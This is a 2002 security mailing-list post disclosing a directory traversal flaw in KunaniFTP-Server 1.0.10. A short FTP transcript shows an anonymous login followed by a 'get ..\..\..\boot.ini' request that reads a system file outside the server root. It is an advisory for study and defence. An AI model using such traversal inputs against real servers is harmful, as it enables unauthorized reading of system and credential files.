SecurityFocus

KunaniFTP-Server v.1.0.10 allows dictionary traversal Dec 10 2002 10:23PM
Zero-X www.lobnan.de Team (zero-x linuxmail org) (1 replies)

KunaniFTP-Server v.1.0.10 allows dictionary traversal:

Some ftp-commands in KunaniFTP-Server allows dictionary traversal.

Example:
######################################################
Verbindung mit server.
220 Kunani FTP Server Ready ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################

Sorry for my very bad english. *g*

~~ Zero X, member of www.lobnan.de ~~
--
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

[ reply ]

Re: KunaniFTP-Server v.1.0.10 allows dictionary traversal Dec 11 2002 02:04AM
Alun Jones (alun texis com)